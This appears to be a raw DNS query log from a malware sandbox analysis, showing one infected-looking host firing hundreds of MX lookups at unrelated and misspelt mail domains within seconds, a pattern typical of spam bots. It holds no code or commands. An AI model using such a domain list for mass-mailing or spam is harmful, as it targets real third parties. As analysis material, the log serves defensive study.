                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.518158913 CEST192.168.2.3192.12.94.300x782cStandard query (0)scicom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.518783092 CEST192.168.2.3195.243.137.260x782cStandard query (0)gybond.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.521219969 CEST192.168.2.31.1.1.10x4a2aStandard query (0)ns3.nic.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.685389996 CEST192.168.2.31.1.1.10x37a9Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.859045029 CEST192.168.2.3194.85.61.200x6c2eStandard query (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.859559059 CEST192.168.2.3192.12.94.300x6c2eStandard query (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.872713089 CEST192.168.2.3192.12.94.300x7c2eStandard query (0)bee-s.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.872713089 CEST192.168.2.3192.12.94.300x7c2eStandard query (0)gemil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.873404980 CEST192.168.2.3192.12.94.300x7c2eStandard query (0)lyon.condesa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.874118090 CEST192.168.2.3192.31.80.300x7c2eStandard query (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.874567032 CEST192.168.2.3192.12.94.300x7c2eStandard query (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.875101089 CEST192.168.2.3194.0.25.280x7c2eStandard query (0)sportwave.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.876187086 CEST192.168.2.3192.31.80.300x7c2eStandard query (0)naui.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.876940966 CEST192.168.2.3156.154.125.700x7c2eStandard query (0)icci.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.876941919 CEST192.168.2.3192.12.94.300x7c2eStandard query (0)tcmri.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.877490044 CEST192.168.2.345.142.220.390x7c2eStandard query (0)hitmail.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.888046026 CEST192.168.2.3192.12.94.300x8c2eStandard query (0)clubadriatic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.888746023 CEST192.168.2.3185.159.196.20x8c2eStandard query (0)defran.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.889435053 CEST192.168.2.3192.12.94.300x8c2eStandard query (0)web.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.890058041 CEST192.168.2.3199.19.56.10x8c2eStandard query (0)burke.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.982593060 CEST192.168.2.3208.67.222.2220xe92eStandard query (0)tvcskyshop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.982975006 CEST192.168.2.38.8.4.40xe92eStandard query (0)botters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.983866930 CEST192.168.2.31.0.0.10xe92eStandard query (0)polishprincess.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.983869076 CEST192.168.2.39.9.9.90xe92eStandard query (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.997212887 CEST192.168.2.31.0.0.10xf92eStandard query (0)people.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:36.997503996 CEST192.168.2.38.8.4.40xf92eStandard query (0)visimax.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.012814999 CEST192.168.2.3208.67.222.2220x92fStandard query (0)jamesengineering.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.028659105 CEST192.168.2.31.1.1.10x182fStandard query (0)srsparivar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.029005051 CEST192.168.2.39.9.9.90x182fStandard query (0)karamian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.092204094 CEST192.168.2.380.120.17.260x572fStandard query (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.106522083 CEST192.168.2.3162.159.48.970x662fStandard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.107310057 CEST192.168.2.31.1.1.10xf9e2Standard query (0)ns-607.awsdns-11.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.271604061 CEST192.168.2.3205.251.194.950xaf30Standard query (0)eslite.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.272893906 CEST192.168.2.3162.159.24.430xaf30Standard query (0)247virtualassistant.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.272897005 CEST192.168.2.3203.99.24.10xaf30Standard query (0)omicronlambda.ezbunko.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.273744106 CEST192.168.2.31.1.1.10x4517Standard query (0)dns-a.mailobj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.673504114 CEST192.168.2.31.1.1.10xaa3bStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.712595940 CEST192.168.2.3162.159.26.490x1033Standard query (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.712599039 CEST192.168.2.3213.182.54.230x1033Standard query (0)netcourrier.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:37.713311911 CEST192.168.2.31.1.1.10x9c08Standard query (0)ns1.selectel.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.070920944 CEST192.168.2.3188.68.203.100x2335Standard query (0)onlinesadik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.070920944 CEST192.168.2.3194.146.106.1140x2335Standard query (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.072151899 CEST192.168.2.31.1.1.10xc383Standard query (0)ns1.bizland.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.314141989 CEST192.168.2.338.113.1.340xd936Standard query (0)graystoneventures.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.317224026 CEST192.168.2.3108.162.193.1900xd936Standard query (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.326649904 CEST192.168.2.3162.159.48.970xe836Standard query (0)event.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.327816010 CEST192.168.2.31.1.1.10xeaa4Standard query (0)dns12.ovh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.625209093 CEST192.168.2.3213.251.188.1310xcd38Standard query (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.625719070 CEST192.168.2.3194.204.196.340xcd38Standard query (0)scbcameroun.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.626344919 CEST192.168.2.3212.109.32.150xcd38Standard query (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.627005100 CEST192.168.2.3163.114.216.170xcd38Standard query (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.628170013 CEST192.168.2.31.1.1.10x2b1Standard query (0)dns1.a2zsitesolutions.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.863192081 CEST192.168.2.3107.155.71.1030x733aStandard query (0)logicsupport.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.863658905 CEST192.168.2.3162.159.26.2170x733aStandard query (0)adorfon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.864339113 CEST192.168.2.3192.36.135.1070x733aStandard query (0)spray.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.864993095 CEST192.168.2.31.1.1.10xc2a9Standard query (0)eel.dnspod.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.038583040 CEST192.168.2.31.12.0.40x1e3bStandard query (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.039107084 CEST192.168.2.397.74.107.480x1e3bStandard query (0)gunz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.044300079 CEST192.168.2.31.1.1.10xa920Standard query (0)ns1.ccf-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.373218060 CEST192.168.2.364.72.64.100x323dStandard query (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.373687029 CEST192.168.2.397.74.101.20x323dStandard query (0)uf.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.374159098 CEST192.168.2.3162.251.82.1220x323dStandard query (0)deepakfasteners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.375241041 CEST192.168.2.31.1.1.10xa633Standard query (0)dns2.orbis.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.375241041 CEST192.168.2.3162.159.26.1360x323dStandard query (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.539386988 CEST192.168.2.388.99.131.430x993eStandard query (0)paradigma.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.539998055 CEST192.168.2.3209.61.212.1510x993eStandard query (0)gaml.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.540533066 CEST192.168.2.3162.159.26.2120x993eStandard query (0)rightstartmortgage.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.541470051 CEST192.168.2.31.1.1.10x3817Standard query (0)ns1.hostpro.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.685579062 CEST192.168.2.31.1.1.10x945dStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.708290100 CEST192.168.2.391.239.235.1560x1040Standard query (0)zhuko.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.709127903 CEST192.168.2.31.1.1.10x3ad6Standard query (0)pdns3.ultradns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.753011942 CEST192.168.2.31.1.1.10xecd2Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.874454975 CEST192.168.2.3162.159.26.1360xbc40Standard query (0)oranek.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.874455929 CEST192.168.2.3199.7.68.10xbc40Standard query (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.888102055 CEST192.168.2.31.1.1.10x6e6dStandard query (0)ns1.host-anycast.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.201262951 CEST192.168.2.3185.84.96.50xcf42Standard query (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.201934099 CEST192.168.2.3205.251.193.2460xcf42Standard query (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.202461958 CEST192.168.2.3162.159.26.1360xcf42Standard query (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.203599930 CEST192.168.2.3108.162.192.2240xcf42Standard query (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.203602076 CEST192.168.2.31.1.1.10x9aa1Standard query (0)ns1.mainehost.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.356643915 CEST192.168.2.31.1.1.10xc4f9Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.431961060 CEST192.168.2.3206.189.214.60x8544Standard query (0)victoriamansion.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.432717085 CEST192.168.2.31.1.1.10x5e7bStandard query (0)n1.02.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.895828962 CEST192.168.2.382.132.128.980xf48Standard query (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.896775961 CEST192.168.2.3162.159.26.1100xf48Standard query (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.896776915 CEST192.168.2.3209.98.98.10xf48Standard query (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.897393942 CEST192.168.2.3194.0.40.10xf48Standard query (0)vitor.tkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.898035049 CEST192.168.2.31.1.1.10x2779Standard query (0)ns2.qlc.co.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.202581882 CEST192.168.2.3115.112.230.1480x324aStandard query (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.216083050 CEST192.168.2.38.8.8.80x414aStandard query (0)linochaves.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.216402054 CEST192.168.2.3149.112.112.1120x414aStandard query (0)inosat.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.219593048 CEST192.168.2.31.1.1.10x414aStandard query (0)dessy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.219636917 CEST192.168.2.3208.67.220.2200x414aStandard query (0)sumix.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.220143080 CEST192.168.2.31.1.1.10x414aStandard query (0)prtc.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.220144987 CEST192.168.2.38.8.8.80x414aStandard query (0)gmzil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.221071959 CEST192.168.2.3208.67.220.2200x414aStandard query (0)me-cfs.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.221072912 CEST192.168.2.3208.67.222.2220x414aStandard query (0)nyrmusic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.231559992 CEST192.168.2.3149.112.112.1120x514aStandard query (0)icsi.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.232317924 CEST192.168.2.39.9.9.90x514aStandard query (0)plenimagem.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.232378960 CEST192.168.2.31.0.0.10x514aStandard query (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.232686996 CEST192.168.2.31.1.1.10x514aStandard query (0)crosstech.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.232908010 CEST192.168.2.38.8.4.40x514aStandard query (0)immobiliarepunto.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.233285904 CEST192.168.2.39.9.9.90x514aStandard query (0)vizas.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.233961105 CEST192.168.2.31.1.1.10x514aStandard query (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.234206915 CEST192.168.2.3208.67.220.2200x514aStandard query (0)hearst.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.234271049 CEST192.168.2.3208.67.220.2200x514aStandard query (0)gmile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.234740019 CEST192.168.2.38.8.8.80x514aStandard query (0)globcom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.247607946 CEST192.168.2.3208.67.222.2220x614aStandard query (0)pythian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.247607946 CEST192.168.2.3208.67.222.2220x614aStandard query (0)homebeautiful.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.248884916 CEST192.168.2.38.8.4.40x614aStandard query (0)yotanka.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.248953104 CEST192.168.2.3208.67.220.2200x614aStandard query (0)prtcnet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.249418974 CEST192.168.2.31.1.1.10x614aStandard query (0)bvision.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.249726057 CEST192.168.2.38.8.4.40x614aStandard query (0)emial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.250319004 CEST192.168.2.3208.67.222.2220x614aStandard query (0)beeld.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.250716925 CEST192.168.2.38.8.8.80x614aStandard query (0)placemail.onlineMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.251064062 CEST192.168.2.31.1.1.10x614aStandard query (0)mdaltd.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.251425028 CEST192.168.2.3149.112.112.1120x614aStandard query (0)cpacanada.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.262887001 CEST192.168.2.31.0.0.10x704aStandard query (0)dergavoldop.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.263236046 CEST192.168.2.39.9.9.90x704aStandard query (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.263567924 CEST192.168.2.3149.112.112.1120x704aStandard query (0)vob.suMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.264069080 CEST192.168.2.31.1.1.10x704aStandard query (0)culver.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.264069080 CEST192.168.2.31.1.1.10x704aStandard query (0)fojab.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.264488935 CEST192.168.2.31.0.0.10x704aStandard query (0)rustici.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.265012026 CEST192.168.2.3149.112.112.1120x704aStandard query (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.265037060 CEST192.168.2.3208.67.222.2220x704aStandard query (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.265491962 CEST192.168.2.38.8.8.80x704aStandard query (0)outook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.265691042 CEST192.168.2.39.9.9.90x704aStandard query (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.278506041 CEST192.168.2.31.1.1.10x804aStandard query (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.278983116 CEST192.168.2.31.0.0.10x804aStandard query (0)domenicamato.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.279638052 CEST192.168.2.3149.112.112.1120x804aStandard query (0)eilhk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.279639006 CEST192.168.2.39.9.9.90x804aStandard query (0)1982.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.280420065 CEST192.168.2.31.1.1.10x804aStandard query (0)hotmial.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.280992031 CEST192.168.2.31.0.0.10x804aStandard query (0)oswego.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.281295061 CEST192.168.2.3149.112.112.1120x804aStandard query (0)1thecity.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.282382965 CEST192.168.2.31.0.0.10x804aStandard query (0)prodigy.net.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.282442093 CEST192.168.2.3149.112.112.1120x804aStandard query (0)foodallergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.282855988 CEST192.168.2.3208.67.220.2200x804aStandard query (0)sonic.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.294152021 CEST192.168.2.3208.67.220.2200x904aStandard query (0)markerman.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.294509888 CEST192.168.2.31.1.1.10x904aStandard query (0)hamnail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.295332909 CEST192.168.2.38.8.4.40x904aStandard query (0)auchan.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.295334101 CEST192.168.2.39.9.9.90x904aStandard query (0)metro-trust.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.295566082 CEST192.168.2.3208.67.222.2220x904aStandard query (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.295876980 CEST192.168.2.31.1.1.10x904aStandard query (0)nn.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.295876980 CEST192.168.2.3149.112.112.1120x904aStandard query (0)logicify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.296458006 CEST192.168.2.3208.67.222.2220x904aStandard query (0)williamsanderson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.309616089 CEST192.168.2.39.9.9.90x9f4aStandard query (0)hughes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.310446978 CEST192.168.2.38.8.8.80x9f4aStandard query (0)idealtile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.310446978 CEST192.168.2.3149.112.112.1120x9f4aStandard query (0)coreconsulting.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.310455084 CEST192.168.2.3208.67.220.2200x9f4aStandard query (0)evoe.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.310806990 CEST192.168.2.38.8.4.40x9f4aStandard query (0)peoplescom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.311178923 CEST192.168.2.38.8.4.40x9f4aStandard query (0)illinoisalumni.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.311589003 CEST192.168.2.31.0.0.10x9f4aStandard query (0)ukg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.311790943 CEST192.168.2.31.1.1.10x9f4aStandard query (0)axa-im.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.312123060 CEST192.168.2.31.0.0.10x9f4aStandard query (0)trinom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.312407970 CEST192.168.2.31.0.0.10x9f4aStandard query (0)easybuygos.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.325205088 CEST192.168.2.38.8.4.40xaf4aStandard query (0)bvcaa.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.325534105 CEST192.168.2.3149.112.112.1120xaf4aStandard query (0)glasslam-asia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.325783968 CEST192.168.2.38.8.8.80xaf4aStandard query (0)resumesrv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.326076031 CEST192.168.2.39.9.9.90xaf4aStandard query (0)gsl-th.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.326530933 CEST192.168.2.3208.67.220.2200xaf4aStandard query (0)comstarauto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.326814890 CEST192.168.2.3208.67.220.2200xaf4aStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.327697992 CEST192.168.2.31.1.1.10xaf4aStandard query (0)netoverdrive.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.328052044 CEST192.168.2.39.9.9.90xaf4aStandard query (0)victoryconnect.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.328500986 CEST192.168.2.3208.67.222.2220xaf4aStandard query (0)tivejo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.329301119 CEST192.168.2.3208.67.220.2200xaf4aStandard query (0)torba.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.341057062 CEST192.168.2.39.9.9.90xbe4aStandard query (0)vixmalls.comMX (Mail exchange)IN (0x0001)false
